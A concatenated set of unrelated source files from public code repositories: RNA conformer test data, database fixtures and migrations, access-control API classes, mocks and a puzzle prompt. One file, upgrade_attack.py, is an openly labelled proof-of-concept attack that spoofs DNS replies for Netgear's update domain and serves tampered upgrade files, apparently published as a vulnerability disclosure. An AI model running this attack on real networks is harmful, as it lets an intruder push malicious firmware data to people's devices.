:6g: : : : : Z: 203.863: 189.688: 58.000: 84.900: 9999.000: 9999.000: 180.000
:8d: : : : : Z: 9999.000: 9999.000: 9999.000: 148.992: 270.596: 240.892: 180.000
:8d: : : : : Z: 62.225: 176.271: 53.600: 87.262: 9999.000: 9999.000: 180.000
:4d: : : : : Z: 9999.000: 9999.000: 9999.000: 149.822: 249.956: 187.678: 180.000
:4d: : : : : Z: 80.433: 198.133: 61.000: 89.378: 9999.000: 9999.000: 180.000
:6d: : : : : Z: 9999.000: 9999.000: 9999.000: 146.922: 241.222: 88.894: 180.000
:6d: : : : : Z: 59.344: 160.683: 52.333: 83.417: 9999.000: 9999.000: 180.000
:2g: : : : : Z: 9999.000: 9999.000: 9999.000: 141.900: 258.383: 286.517: 180.000
:2g: : : : : Z: 178.267: 165.217: 48.350: 84.783: 9999.000: 9999.000: 180.000
:2h: : : : : Z: 9999.000: 9999.000: 9999.000: 147.782: 260.712: 290.424: 180.000
:2h: : : : : Z: 296.200: 177.282: 175.594: 86.565: 9999.000: 9999.000: 180.000
:4n: : : : : Z: 9999.000: 9999.000: 9999.000: 143.722: 227.256: 203.789: 180.000
:4n: : : : : Z: 73.856: 216.733: 194.444: 80.911: 9999.000: 9999.000: 180.000
:0i: : : : : Z: 9999.000: 9999.000: 9999.000: 148.717: 274.683: 100.283: 180.000
:0i: : : : : Z: 80.600: 248.133: 181.817: 82.600: 9999.000: 9999.000: 180.000
:6n: : : : : Z: 9999.000: 9999.000: 9999.000: 150.311: 268.383: 84.972: 180.000
:6n: : : : : Z: 63.811: 191.483: 176.644: 85.600: 9999.000: 9999.000: 180.000
:6j: : : : : Z: 9999.000: 9999.000: 9999.000: 141.633: 244.100: 66.056: 180.000
:6j: : : : : Z: 71.667: 122.167: 182.200: 83.622: 9999.000: 9999.000: 180.000
:0k: : : : : Z: 9999.000: 9999.000: 9999.000: 149.070: 249.780: 111.520: 180.000
:0k: : : : : Z: 278.370: 207.780: 287.820: 86.650: 9999.000: 9999.000: 180.000
:2[: : : : : Z: 9999.000: 9999.000: 9999.000: 146.383: 259.402: 291.275: 180.000
:2[: : : : : Z: 291.982: 210.048: 54.412: 147.760: 9999.000: 9999.000: 180.000
:4b: : : : : Z: 9999.000: 9999.000: 9999.000: 145.256: 244.622: 162.822: 180.000
:4b: : : : : Z: 294.159: 171.630: 45.900: 145.804: 9999.000: 9999.000: 180.000
:0b: : : : : Z: 9999.000: 9999.000: 9999.000: 147.593: 248.421: 112.086: 180.000
:0b: : : : : Z: 274.943: 164.764: 56.843: 146.264: 9999.000: 9999.000: 180.000
:4p: : : : : Z: 9999.000: 9999.000: 9999.000: 150.077: 260.246: 213.785: 180.000
:4p: : : : : Z: 71.900: 207.638: 56.715: 148.131: 9999.000: 9999.000: 180.000
:6p: : : : : Z: 9999.000: 9999.000: 9999.000: 146.415: 257.831: 89.597: 180.000
:6p: : : : : Z: 67.923: 173.051: 55.513: 147.623: 9999.000: 9999.000: 180.000
:2z: : : : : Z: 9999.000: 9999.000: 9999.000: 142.900: 236.550: 268.800: 180.000
:2z: : : : : Z: 180.783: 185.133: 54.467: 143.350: 9999.000: 9999.000: 180.000
:4s: : : : : Z: 9999.000: 9999.000: 9999.000: 149.863: 247.562: 170.488: 180.000
:4s: : : : : Z: 277.938: 84.425: 176.413: 148.087: 9999.000: 9999.000: 180.000
:2u: : : : : Z: 9999.000: 9999.000: 9999.000: 143.940: 258.200: 298.240: 180.000
:2u: : : : : Z: 279.640: 183.680: 183.080: 145.120: 9999.000: 9999.000: 180.000
:2o: : : : : Z: 9999.000: 9999.000: 9999.000: 147.342: 256.475: 295.508: 180.000
:2o: : : : : Z: 287.408: 194.525: 293.725: 150.458: 9999.000: 9999.000: 180.000
:epsilon: : : : : Z: 294.967: 173.990: 53.550: 81.495: 154.000: 288.831: 180.000
:epsilon: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:alpha: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:alpha: : : : : Z: 24.000: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:beta: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:beta: : : : : Z: 294.967: 49.000: 53.550: 81.495: 212.250: 288.831: 180.000
:zeta: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 24.000: 180.000
:zeta: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:delta-1: : : : : Z: 294.967: 173.990: 53.550: 59.000: 212.250: 288.831: 180.000
:delta-1: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:gamma: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:gamma: : : : : Z: 294.967: 173.990: 139.000: 81.495: 212.250: 288.831: 180.000
:delta: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:delta: : : : : Z: 294.967: 173.990: 53.550: 59.000: 212.250: 288.831: 180.000
'''
# A manually selected group of test cases from real files
# designed to test each code path through membership(). The first residue from
# each pair has intentionally been damaged so that it will not produce separate
# output from a report. We use the causes option to illustrate what code path
# is being used.
input2 = u'''2xLk:1: C: 11: : : G:__?__:__?__:__?__:81.132:-127.583:-70.677
2xLk:1: C: 12: : : U:169.008:153.891:51.391:80.277:-135.347:-70.614
3cgp:1: B: 19: : : U:__?__:__?__:__?__:82.839:-147.528:-179.087
3cgp:1: B: 20: : : A:139.983:-154.445:63.134:88.055:-145.599:70.874
4pco:1: B: 3: : : U:__?__:__?__:__?__:77.659:-165.227:-68.525
4pco:1: B: 4: : : G:151.914:-179.903:176.058:83.039:-148.171:-66.728
5b2q:1: B: 62: : : G:__?__:__?__:__?__:83.537:-131.816:-116.417
5b2q:1: B: 63: : : U:-69.320:-146.615:47.107:147.038:-148.815:45.665
6gc5:1: F: 2: : : U:__?__:__?__:__?__:144.610:-116.227:152.694
6gc5:1: F: 3: : : U:-66.167:162.580:41.697:145.644:-122.673:127.881
3bns:1: A: 21: : : C:__?__:__?__:__?__:76.224:-166.174:-73.594
3bns:1: A: 22: : : G:150.784:-158.788:175.706:87.605:-146.172:-63.516
3gm7:1: H: 5: : : U:__?__:__?__:__?__:68.910:-153.989:-56.381
3gm7:1: H: 6: : : G:-105.747:164.057:92.120:74.597:-150.523:-79.724
6qit:1: A: 2: : : C:__?__:__?__:__?__:82.169:-138.695:-63.417
6qit:1: A: 3: : : A:-71.504:-131.618:54.061:144.409:-95.827:-140.754
3rer:1: K: 7: : : U:__?__:__?__:__?__:87.510:-99.276:-118.108
3rer:1: K: 8: : : A:-66.924:-158.118:48.287:81.250:__?__:__?__
3diL:1: A: 59: : : C:__?__:__?__:__?__:80.668:-145.667:-36.026
3diL:1: A: 60: : : G:-143.441:115.188:149.951:86.379:-141.567:-69.901
5ho4:1: B: 3: : : G:__?__:__?__:__?__:160.213:-123.685:-174.677
5ho4:1: B: 4: : : G:-107.676:163.883:39.081:85.911:-157.392:-71.638
4mcf:1: E: 4: : : U:__?__:__?__:__?__:78.239:-156.881:-70.399
4mcf:1: E: 5: : : G:-91.794:163.594:87.552:70.675:-141.886:-72.556
3pdr:1: A: 59: : : C:__?__:__?__:__?__:80.441:-149.674:-76.690
3pdr:1: A: 60: : : A:-62.415:171.383:47.537:79.461:-145.680:-71.359
3gm7:1: G: 1: : : C:__?__:__?__:__?__:84.065:-128.784:-61.905
3gm7:1: G: 2: : : U:-76.914:-166.398:55.279:74.218:-157.766:-64.720
6h0r:1: B: 15: : : U:__?__:__?__:__?__:83.971:-122.349:-103.636
6h0r:1: B: 16: : : U:-30.804:145.657:33.314:81.109:-141.719:-75.527
2zko:1: C: 13: : : G:__?__:__?__:__?__:76.629:-150.027:-67.298
2zko:1: C: 14: : : C:-70.016:164.567:71.735:76.499:-160.106:-73.474
3pdr:1: X: 138: : : U:__?__:__?__:__?__:77.324:-177.192:-105.412
3pdr:1: X: 139: : : A:-46.950:179.570:49.599:71.442:-143.233:-61.461
4jah:1: B: 10: : : U:__?__:__?__:__?__:85.890:-164.804:-95.055
4jah:1: B: 11: : : G:-64.134:178.767:49.773:77.067:-152.496:-70.128
3diL:1: A: 13: : : C:__?__:__?__:__?__:135.303:-125.074:-69.725
3diL:1: A: 14: : : G:75.452:147.741:32.719:83.048:-146.012:-75.223
3pdr:1: X: 132: : : U:__?__:__?__:__?__:77.469:-157.795:-115.458
3pdr:1: X: 133: : : U:47.309:136.943:-25.259:83.460:-150.210:-61.763
'''
output1='''
:1a: : : : : Z 33 p 1a 1.000
:1m: : : : : Z 33 p 1m 1.000
:1L: : : : : Z 33 p 1L 1.000
:&a: : : : : Z 33 p &a 1.000
:7a: : : : : Z 33 p 7a 1.000
:3a: : : : : Z 33 p 3a 1.000
:9a: : : : : Z 33 p 9a 1.000
:1g: : : : : Z 33 p 1g 1.000
:7d: : : : : Z 33 p 7d 1.000
:3d: : : : : Z 33 p 3d 1.000
:5d: : : : : Z 33 p 5d 1.000
:3g: : : : : Z 33 p 3g 1.000 wannabe
:1e: : : : : Z 33 t 1e 1.000
:1c: : : : : Z 33 t 1c 1.000
:1f: : : : : Z 33 t 1f 1.000
:5j: : : : : Z 33 t 5j 1.000
:5n: : : : : Z 33 t 5n 1.000 wannabe
:!!: : : : : Z trig !! 0.000 epsilon-1
:1b: : : : : Z 32 p 1b 1.000
:1[: : : : : Z 32 p 1[ 1.000
:3b: : : : : Z 32 p 3b 1.000
:1z: : : : : Z 32 p 1z 1.000
:5z: : : : : Z 32 p 5z 1.000
:7p: : : : : Z 32 p 7p 1.000
:5p: : : : : Z 32 p 5p 1.000 wannabe
:1t: : : : : Z 32 t 1t 1.000
:5q: : : : : Z 32 t 5q 1.000
:1o: : : : : Z 32 m 1o 1.000
:7r: : : : : Z 32 m 7r 1.000
:5r: : : : : Z 32 m 5r 1.000 wannabe
:2a: : : : : Z 23 p 2a 1.000
:4a: : : : : Z 23 p 4a 1.000
:0a: : : : : Z 23 p 0a 1.000
:#a: : : : : Z 23 p #a 1.000
:4g: : : : : Z 23 p 4g 1.000
:6g: : : : : Z 23 p 6g 1.000
:8d: : : : : Z 23 p 8d 1.000
:4d: : : : : Z 23 p 4d 1.000
:6d: : : : : Z 23 p 6d 1.000
:2g: : : : : Z 23 p 2g 1.000 wannabe
:2h: : : : : Z 23 t 2h 1.000
:4n: : : : : Z 23 t 4n 1.000
:0i: : : : : Z 23 t 0i 1.000
:6n: : : : : Z 23 t 6n 1.000
:6j: : : : : Z 23 t 6j 1.000
:0k: : : : : Z 23 m 0k 1.000 wannabe
:2[: : : : : Z 22 p 2[ 1.000
:4b: : : : : Z 22 p 4b 1.000
:0b: : : : : Z 22 p 0b 1.000
:4p: : : : : Z 22 p 4p 1.000
:6p: : : : : Z 22 p 6p 1.000
:2z: : : : : Z 22 p 2z 1.000 wannabe
:4s: : : : : Z 22 t 4s 1.000
:2u: : : : : Z 22 t 2u 1.000 wannabe
:2o: : : : : Z 22 m 2o 1.000
:epsilon: : : : : Z trig !! 0.000 epsilon-1
:alpha: : : : : Z 33 p 1a 0.999
:alpha: : : : : Z trig !! 0.000 alpha
:beta: : : : : Z 33 p 1a 0.999
:beta: : : : : Z trig !! 0.000 beta
:zeta: : : : : Z 33 p 1a 0.999
:zeta: : : : : Z trig !! 0.000 zeta-1
:delta-1: : : : : Z trig !! 0.000 delta
:delta-1: : : : : Z trig !! 0.000 delta-1
:gamma: : : : : Z 33 p 1a 0.999
:gamma: : : : : Z trig !! 0.000 gamma
:delta: : : : : Z 33 p 1a 0.999
:delta: : : : : Z trig !! 0.000 delta
'''
output2 = '''2xLk:1: C: 12: : : U 33 p 1g 0.839 1-only-one
3cgp:1: B: 20: : : A 33 p 3g 0.040 1-only-one wannabe
4pco:1: B: 4: : : G 33 t 1c 0.890 2-BETWEEN-dom-sat( 0.22| 0.913)
5b2q:1: B: 63: : : U 32 p 1[ 0.072 2-BETWEEN-dom-sat( 0.941| 0.829)
6gc5:1: F: 3: : : U 22 p 4b 0.889 2-None-dom
3bns:1: A: 22: : : G 33 t 1c 0.901 2-OUTSIDE-dom
3gm7:1: H: 6: : : G 33 p !! 0.000 7D dist 1a
6qit:1: A: 3: : : A 32 p 1[ 0.899 2-OUTSIDE-sat
3rer:1: K: 8: : : A 33 p 7a 0.047 2-None-dom
3diL:1: A: 60: : : G 33 t !! 0.000 7D dist 1e
5ho4:1: B: 4: : : G 23 p !! 0.000 7D dist 4a
4mcf:1: E: 5: : : G 33 p !! 0.000 7D dist 1a
3pdr:1: A: 60: : : A 33 p 1a 0.916 4-BETWEEN-dom-sat( 0.1| 1.2)
3gm7:1: G: 2: : : U 33 p 1a 0.589 4-BETWEEN-dom-sat( 0.428| 0.904)
6h0r:1: B: 16: : : U 33 p 1L 0.033 4-BETWEEN-dom-sat( 0.862| 0.655)
2zko:1: C: 14: : : C 33 p 1a 0.444 4-OUTSIDE-dom
3pdr:1: X: 139: : : A 33 p &a 0.555 4-OUTSIDE-sat
4jah:1: B: 11: : : G 33 p &a 0.912 5-BETWEEN-dom-sat( 0.442| 0.226)
3diL:1: A: 14: : : G 23 p !! 0.000 outlier distance 1.01
3pdr:1: X: 133: : : U 33 m !! 0.000 vacant bin
'''
def test(input, canonicalOutput, options, identity):
opt = suites.parseOptions(options)
stream = StringIO(input)
outFile=StringIO()
suitename.clearStats()
suitename.main(stream, outFile=outFile, optionsIn=opt)
suitename.clearStats()
output = outFile.getvalue()
assert output.strip() == canonicalOutput.strip(), identity
def testAll():
test(input1, output1, "chart=true noinc=true", "cluster and triage test")
test(input2, output2, "chart=true noinc=true causes=true",
"code paths test")
test(regression.in_1ehz, regression.out_1ehz, "", "1ehz regression test")
# Not normally used, but useful for diagnosing failures
def testVerbose(input, canonicalOutput, options, identity):
opt = suites.parseOptions(options)
stream = StringIO(input)
outFile=StringIO("")
suitename.clearStats()
suitename.main(stream, outFile=outFile, optionsIn=opt)
output = outFile.getvalue()
if output.strip() == canonicalOutput.strip():
result = True
sys.stderr.write("Success\n")
else:
result = False
sys.stderr.write("Failed\n")
sys.stderr.write("========================================\n")
sys.stderr.write(canonicalOutput.strip())
sys.stderr.write("\n\n=========================================\n")
sys.stderr.write(output.strip())
out2 = open("UnitTest-output.txt", "w")
out2.write(output.strip())
out2.close()
return result
testAll()
|
test/correctness/conftest.py | kolesa-team/fdb-document-layer | 176 | 12664196 | #!/usr/bin/python
#
# conftest.py
#
# This source file is part of the FoundationDB open source project
#
# Copyright 2013-2019 Apple Inc. and the FoundationDB project authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# MongoDB is a registered trademark of MongoDB, Inc.
#
import pytest
import pymongo
import random
import log
logger = log.setup_logger(__name__)
def pytest_addoption(parser):
parser.addoption('--doclayer-port', action='store', default=27018, help="Port that Doc Layer is listening on")
@pytest.yield_fixture(scope='session')
def fixture_client(request):
port = request.config.getoption('--doclayer-port')
client = pymongo.MongoClient('127.0.0.1:{}'.format(port))
yield client
@pytest.yield_fixture(scope='session')
def fixture_db(fixture_client):
db_name = 'db_{}'.format(random.getrandbits(64))
db = fixture_client[db_name]
yield db
fixture_client.drop_database(db_name)
@pytest.yield_fixture(scope='function')
def fixture_collection(fixture_db):
coll_name = 'coll_{}'.format(random.getrandbits(64))
collection = fixture_db[coll_name] # type: pymongo.collection
yield collection
collection.drop()
|
2021.09.21-netgear-circle/upgrade_attack.py | bbhunter/NotQuite0DayFriday | 756 | 12664202 | <reponame>bbhunter/NotQuite0DayFriday<filename>2021.09.21-netgear-circle/upgrade_attack.py
#!/usr/bin/env python
from multiprocessing import Process
from time import sleep
import argparse
import http.server
import re
import socketserver
import socket
from scapy.all import *
def build_dns_response(query, name):
ip = query[IP]
udp = query[UDP]
dns = query[DNS]
dns_answer = DNSRR(rrname=name, type='A', rclass='IN', ttl=5, rdata=server_ip)
response = IP(src=ip.dst, dst=ip.src)
response /= UDP(sport=udp.dport, dport=udp.sport)
response /= DNS(id=dns.id, qr=1, aa=0, qdcount=1, ancount=1, qd=dns.qd, an=dns_answer)
return response
def parse_dns_query(pkt):
if DNSRR in pkt:
name = pkt[DNSRR].rrname.decode('UTF-8', errors='backslashreplace')
print(f'DNS Response for "{name}" from {pkt[IP].src}')
elif DNSQR in pkt:
name = pkt[DNSQR].qname.decode('UTF-8', errors='backslashreplace')
print(f'DNS Query for "{name}" from {pkt[IP].src}')
for update_domain in update_domains:
if name.startswith(update_domain):
dns_response = build_dns_response(pkt, name)
send(dns_response, iface=sniff_iface)
print(f'[+] Target DNS Query responded to with {server_ip}')
def udp_callback(pkt):
if IP not in pkt or UDP not in pkt:
return
udp = pkt[UDP]
try:
if udp.dport == 53 or udp.sport == 53:
parse_dns_query(pkt)
except Exception as e:
print(f'[!] Packet caused exception: {str(e)}')
print(f' {pkt.summary()}')
class CustomHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
# strip extra params for pattern matching
if '?' in self.path:
path = self.path[:self.path.find('?')]
else:
path = self.path
if path.endswith('database.tar.gz'):
# serve our copy of the circleinfo.txt file with the malicious info
self.path = './database_pwn.tar.gz'
return http.server.SimpleHTTPRequestHandler.do_GET(self)
elif path.endswith('circleinfo.txt'):
# serve our copy of the circleinfo.txt file with the malicious info
self.path = './circleinfo_pwn.txt'
return http.server.SimpleHTTPRequestHandler.do_GET(self)
else:
# Respond to all other requests with a 404
self.send_response(404)
self.end_headers()
return
def serve_http_thread(server_ip, http_port):
http_address = (server_ip, http_port)
custom_http_server = socketserver.TCPServer(http_address, CustomHttpRequestHandler)
print(f'Serving HTTP at {server_ip} on port {http_port}...')
try:
while True:
custom_http_server.handle_request()
except KeyboardInterrupt:
pass
print('HTTP server stopped.')
if __name__ == "__main__":
parser = argparse.ArgumentParser('upgrade_attack.py', description='Proof of concept MitM on Circle upgrade')
parser.add_argument('interface', help='Interface to sniff/send on')
parser.add_argument('ip_address', help='IP to serve fake update on')
args = parser.parse_args()
sniff_iface = args.interface
server_ip = args.ip_address
http_port = 80
# The typical update domains
update_domains = ['http.updates1.netgear.com']
http_child = Process(target=serve_http_thread, args=(server_ip, http_port))
http_child.start()
# Let the HTTP server start up first
sleep(1)
if not http_child.is_alive():
print('Error: HTTP server failed to start correctly, quitting...')
exit(-1)
# Removes extra scapy logging on send()
conf.verb = False
print(f'Sniffing for upgrade traffic on interface {sniff_iface}, Press CTRL+C to stop...')
try:
sniff(iface=sniff_iface, prn=udp_callback, filter="udp", store=False)
except Scapy_Exception as e:
print(f'Scapy Exception occurred: {str(e)}')
print(f'Error: Sniffing failed, check you\'re on the right interface and run with sudo.')
http_child.terminate()
http_child.join()
print('Done.')
|
backend/r2dec/mdec-r2dec/mdecr2dec/__main__.py | clayne/mdec | 317 | 12664265 | from mdecr2dec import R2decService
from mdecbase import mdec_main
if __name__ == '__main__':
mdec_main(R2decService)
|
tests/mock_objects.py | JPTIZ/asciimatics | 3,197 | 12664288 | <filename>tests/mock_objects.py
from asciimatics.effects import Effect
from asciimatics.exceptions import StopApplication, NextScene
class MockEffect(Effect):
"""
Dummy Effect use for some UTs.
"""
def __init__(self, count=10, stop=True, swallow=False, next_scene=None,
frame_rate=1, stop_frame=5, **kwargs):
"""
:param count: When to stop effect
:param stop: Whether to stop the application or skip to next scene.
:param swallow: Whether to swallow any events or not.
:param next_scene: The next scene to move to (if stop=False)
:param frame_rate: The frame rate for updates.
"""
super(MockEffect, self).__init__(None, **kwargs)
self.stop_called = False
self.reset_called = False
self.event_called = False
self.save_called = False
self.update_called = False
self._count = count
self._stop = stop
self._swallow = swallow
self._next_scene = next_scene
self._frame_rate = frame_rate
# Ugly hack to stop clash with underlying Effect definition. Sorry.
self._my_stop_frame = stop_frame
@property
def stop_frame(self):
self.stop_called = True
return self._my_stop_frame
@property
def frame_update_count(self):
return self._frame_rate
def _update(self, frame_no):
self.update_called = True
self._count -= 1
if self._count <= 0:
if self._stop:
raise StopApplication("End of test")
else:
raise NextScene(self._next_scene)
def reset(self):
self.reset_called = True
def process_event(self, event):
self.event_called = True
return None if self._swallow else event
def save(self):
self.save_called = True
|
homeassistant/components/eq3btsmart/const.py | MrDelik/core | 30,023 | 12664295 | """Constants for EQ3 Bluetooth Smart Radiator Valves."""
PRESET_PERMANENT_HOLD = "permanent_hold"
PRESET_NO_HOLD = "no_hold"
PRESET_OPEN = "open"
PRESET_CLOSED = "closed"
|
alembic/versions/3bc50ecd0bb_add_generic_id_support.py | bigblue/pynab | 161 | 12664296 | """add generic id support
Revision ID: 3bc50ecd0bb
Revises: <PASSWORD>
Create Date: 2015-10-28 19:25:26.378971
"""
# chunk size to process tv/movies
PROCESS_CHUNK_SIZE = 5000
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '30688404cda'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.schema import Sequence, CreateSequence, MetaData
import config
meta = MetaData()
def upgrade():
### commands auto generated by Alembic - please adjust! ###
dbid = op.create_table('dbids',
sa.Column('id', sa.BigInteger(), nullable=False),
sa.Column('db_id', sa.String(length=50), nullable=True),
sa.Column('db', sa.Enum('TVRAGE', 'TVMAZE', 'OMDB', 'IMDB', name='enum_dbid_name'), nullable=True),
sa.Column('tvshow_id', sa.Integer(), nullable=True),
sa.Column('movie_id', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id'),
mysql_charset='utf8',
mysql_engine='InnoDB',
mysql_row_format='DYNAMIC'
)
op.create_index('idx_db_id_db', 'dbids', ['db_id', 'db'], unique=False)
op.create_index(op.f('ix_dbids_movie_id'), 'dbids', ['movie_id'], unique=False)
op.create_index(op.f('ix_dbids_tvshow_id'), 'dbids', ['tvshow_id'], unique=False)
bind = op.get_bind()
i = 0
releases = sa.Table('releases', meta, autoload=True, autoload_with=bind)
movies = sa.Table('movies', meta, autoload=True, autoload_with=bind)
tvshows = sa.Table('tvshows', meta, autoload=True, autoload_with=bind)
episodes = sa.Table('episodes', meta, autoload=True, autoload_with=bind)
op.drop_constraint('releases_movie_id_fkey', 'releases')
op.drop_constraint('releases_tvshow_id_fkey', 'releases')
op.drop_constraint('episodes_tvshow_id_fkey', 'episodes')
print('Starting ID conversion.')
for show in bind.execute(tvshows.select().order_by(tvshows.c.id)):
# Small chance that the new id might conflict with an existing
# id. If so just increment and try again.
new_id_ok = False
while not new_id_ok:
if bind.execute(tvshows.select(tvshows.c.id == i)).first():
print('Found dupe id, incrementing new id')
i += 1
else:
new_id_ok = True
try:
print('TVRAGE: {} ({}) -> {}'.format(show[tvshows.c.name], show[tvshows.c.id], i))
except:
# it's just for show, it doesn't matter
pass
bind.execute(dbid.insert().values(
id=i,
db='TVRAGE',
db_id=show[tvshows.c.id],
tvshow_id=i
))
bind.execute(releases.update().where(releases.c.tvshow_id==show[tvshows.c.id]).values(tvshow_id=i))
bind.execute(episodes.update().where(episodes.c.tvshow_id==show[tvshows.c.id]).values(tvshow_id=i))
bind.execute(tvshows.update().where(tvshows.c.id==show[tvshows.c.id]).values(id=i))
i += 1
for movie in bind.execute(movies.select().order_by(movies.c.id)):
# Small chance that the new id might conflict with an existing
# id. If so just increment and try again.
new_id_ok = False
while not new_id_ok:
# movies.id is a character string
if bind.execute(movies.select(movies.c.id == str(i))).first():
print('Found dupe id, incrementing new id')
i += 1
else:
new_id_ok = True
try:
print('IMDB: {} ({}) -> {}'.format(movie[movies.c.name], movie[movies.c.id], i))
except:
pass
bind.execute(dbid.insert().values(
id=i,
db='IMDB',
db_id='tt{}'.format(movie[movies.c.id]),
movie_id=i
))
bind.execute(releases.update().where(releases.c.movie_id==movie[movies.c.id]).values(movie_id=i))
bind.execute(movies.update().where(movies.c.id==movie[movies.c.id]).values(id=i))
i += 1
bind.execute(CreateSequence(Sequence('movies_id_seq', start=i)))
if config.db.get('engine') == 'postgresql':
bind.execute('ALTER TABLE movies ALTER COLUMN id TYPE INTEGER USING id::integer')
bind.execute('ALTER TABLE releases ALTER COLUMN movie_id TYPE INTEGER USING movie_id::integer')
else:
op.alter_column('movies', 'id',
existing_type=sa.VARCHAR(length=20),
type_=sa.Integer(),
existing_nullable=False,
server_default=sa.text('nextval(\'movies_id_seq\'::regclass)')
)
op.alter_column('releases', 'movie_id',
existing_type=sa.VARCHAR(length=20),
type_=sa.Integer(),
existing_nullable=False
)
op.create_foreign_key('releases_movie_id_fkey', 'releases', 'movies', ['movie_id'], ['id'])
op.create_foreign_key('releases_tvshow_id_fkey', 'releases', 'tvshows', ['tvshow_id'], ['id'])
op.create_foreign_key('episodes_tvshow_id_fkey', 'episodes', 'tvshows', ['tvshow_id'], ['id'])
op.create_foreign_key('dbids_tvshow_id_fkey', 'dbids', 'tvshows', ['tvshow_id'], ['id'])
op.create_foreign_key('dbids_movie_id_fkey', 'dbids', 'movies', ['movie_id'], ['id'])
bind.execute("select setval('dbids_id_seq', (select max(id) from dbids));")
bind.execute("select setval('tvshows_id_seq', (select max(id) from tvshows));")
bind.execute("select setval('movies_id_seq', (select max(id) from movies));")
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column('movies', 'id',
existing_type=sa.Integer(),
type_=sa.VARCHAR(length=20),
existing_nullable=False)
op.drop_index(op.f('ix_dbids_tvshow_id'), table_name='dbids')
op.drop_index(op.f('ix_dbids_movie_id'), table_name='dbids')
op.drop_index('idx_db_id_db', table_name='dbids')
op.drop_table('dbids')
### end Alembic commands ###
|
src/api/accesscontrolprofile.py | piwaniuk/critic | 216 | 12664333 | # -*- mode: python; encoding: utf-8 -*-
#
# Copyright 2015 the Critic contributors, Opera Software ASA
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import api
class AccessControlProfileError(api.APIError):
"""Base exception for all errors related to the AccessControlProfile
class"""
pass
class InvalidAccessControlProfileId(AccessControlProfileError):
"""Raised when an invalid access control profile id is used"""
def __init__(self, value):
"""Constructor"""
super(InvalidAccessControlProfileId, self).__init__(
"Invalid access control profile id: %d" % value)
self.value = value
class AccessControlProfile(api.APIObject):
"""Representation of a an access control profile"""
RULE_VALUES = frozenset(["allow", "deny"])
@property
def id(self):
"""The profile's unique id"""
return self._impl.id
@property
def title(self):
"""The profile's title, or None"""
return self._impl.title
@property
def access_token(self):
"""The access token that owns this profile, or None"""
return self._impl.getAccessToken(self.critic)
class Category(object):
"""Representation of an access control category
Each category is controlled by a rule ("allow" or "deny") and a list
of exceptions (possibly empty). The effective policy is the rule,
unless an exception applies, in which case it's the opposite of the
rule."""
def __init__(self, rule, exceptions):
self.rule = rule
self.exceptions = exceptions
class HTTPException(object):
"""Representation of an exception for the "http" category
The exception consists of the HTTP request method and a regular
expression that must match the entire request path."""
REQUEST_METHODS = frozenset(["GET", "HEAD", "OPTIONS",
"POST", "PUT", "DELETE"])
def __init__(self, exception_id, request_method, path_pattern):
self.id = exception_id
self.request_method = request_method
self.path_pattern = path_pattern
@property
def http(self):
"""Access control category "http"
This category controls web frontend requests.
Exceptions are of the type HTTPException."""
return self._impl.getHTTP(self.critic)
class RepositoryException(object):
"""Representation of an exception for the "repositories" category
The exception consists of the access type ("read" or "modify") and the
repository."""
ACCESS_TYPES = frozenset(["read", "modify"])
def __init__(self, exception_id, access_type, repository):
self.id = exception_id
self.access_type = access_type
self.repository = repository
@property
def repositories(self):
"""Access control category "repositories"
This category controls access to Git repositories, both via the web
frontend and the Git hook. Note that read-only Git access over SSH
is not controlled by access control.
Exceptions are of the type RepositoryException."""
return self._impl.getRepositories(self.critic)
class ExtensionException(object):
"""Representation of an exception for the "extensions" category
The exception consists of the access type ("install" or "execute")
and the extension."""
ACCESS_TYPES = frozenset(["install", "execute"])
def __init__(self, exception_id, access_type, extension):
self.id = exception_id
self.access_type = access_type
self.extension = extension
@property
def extensions(self):
"""Access control category "extensions"
This category controls access to any functionality provided by an
extension.
Exceptions are of the type ExtensionException."""
return self._impl.getExtensions(self.critic)
def fetch(critic, profile_id):
"""Fetch an AccessControlProfile object with the given profile id"""
import api.impl
assert isinstance(critic, api.critic.Critic)
return api.impl.accesscontrolprofile.fetch(critic, int(profile_id))
def fetchAll(critic, title=None):
"""Fetch AccessControlProfile objects for all primary profiles in the system
A profile is primary if it is not the additional restrictions imposed for
accesses authenticated with an access token.
If |title| is not None, fetch only profiles with a matching title."""
import api.impl
assert isinstance(critic, api.critic.Critic)
if title is not None:
title = str(title)
return api.impl.accesscontrolprofile.fetchAll(critic, title)
|
google_problems/problem_83.py | loftwah/Daily-Coding-Problem | 129 | 12664348 | """This problem was asked by Google.
You are writing an AI for a 2D map game. You are somewhere in a 2D grid,
and there are coins strewn about over the map.
Given the position of all the coins and your current position,
find the closest coin to you in terms of Manhattan distance.
That is, you can move around up, down, left, and right, but not diagonally.
If there are multiple possible closest coins, return any of them.
For example, given the following map, where you are x, coins are o,
and empty spaces are . (top left is 0, 0):
---------------------
| . | . | x | . | o |
---------------------
| o | . | . | . | . |
---------------------
| o | . | . | . | o |
---------------------
| . | . | o | . | . |
---------------------
